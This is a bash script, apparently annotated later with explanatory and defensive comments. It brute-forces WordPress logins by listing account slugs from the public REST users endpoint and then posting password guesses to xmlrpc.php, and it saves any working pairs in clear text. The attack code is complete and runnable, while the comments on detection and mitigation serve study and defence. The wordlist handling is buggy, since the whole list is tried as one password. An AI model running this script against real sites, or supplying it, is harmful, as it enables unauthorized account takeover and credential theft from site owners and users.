- #!/bin/bash
- # WORDPRESS XMLRPC BRUTEFORCE
- # save password list with name > wordlist.txt
- function _brute() {  # $1 = base URL of one WordPress site. Collects account slugs, then tests a short password list per slug over XML-RPC; returns 0 at the first pair it judges valid.
- TARGET="${1}";  # not declared local, so it remains set in the calling shell
- JSONUSER=$(curl -s "${TARGET}/wp-json/wp/v2/users" | grep -Po '"slug":"\K.*?(?=")');  # Unauthenticated GET of the REST users endpoint; every "slug" value in the reply is treated as a login name. Defence: require authentication for this route (or remove it) and log requests to it.
- if [[ ! -z ${JSONUSER} ]];then  # continue only when at least one slug was extracted
- echo "INFO: ${TARGET} username found!"
- for USER in ${JSONUSER};  # unquoted, so word-splitting yields one iteration per slug
- do
- PASS=( '123456' '12345678' 'admin' 'qwerty' 'qwerty123' ''"${USER}"'' ''"${USER}123"'' ''"$(cat wordlist.txt | tr '\r\n' ' ')"'' );  # Candidates: five fixed common passwords, the slug itself, the slug + "123", and the text of wordlist.txt (CR/LF turned into spaces by tr). Default and username-derived passwords are what this list covers.
- for PWD in "${PASS[@]}";
- do
- BRUTE=$(timeout 3 curl -s -X POST -d '<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>'$USER'</value></param><param><value>'$PWD'</value></param></params></methodCall>' ${TARGET}/xmlrpc.php);  # One POST to /xmlrpc.php per guess, calling wp.getUsersBlogs, abandoned after 3 s. Detection: many such POSTs from one source in a short window. Mitigation: disable or block XML-RPC where it is unused, throttle failed authentications on this path as well as on the login form, and enforce strong passwords.
- if [[ ${BRUTE} =~ "blogName" ]];then  # success is inferred from the substring "blogName" appearing in the response body
- echo " FOUND!: ${TARGET} ${USER}:${PWD} saved to WORDPRESS-LOGIN.TXT";
- echo "${TARGET} ${USER}:${PWD}" >> WORDPRESS-LOGIN.TXT  # appends the pair in clear text to a file in the working directory; the file name is an artefact worth searching for during incident response
- return 0;  # stops at the first hit; remaining slugs and candidates are not tried
- else
- echo " FAILED: ${TARGET} ${USER}:${PWD}";
- fi
- done
- done
- else
- echo "ERROR: ${TARGET} can grab username";  # reached when no slug was extracted, e.g. an empty reply or a reply without "slug" fields
- fi
- }
- _brute ${1}  # entry point: passes the script's first argument as the site URL; unquoted, so the value is word-split before the call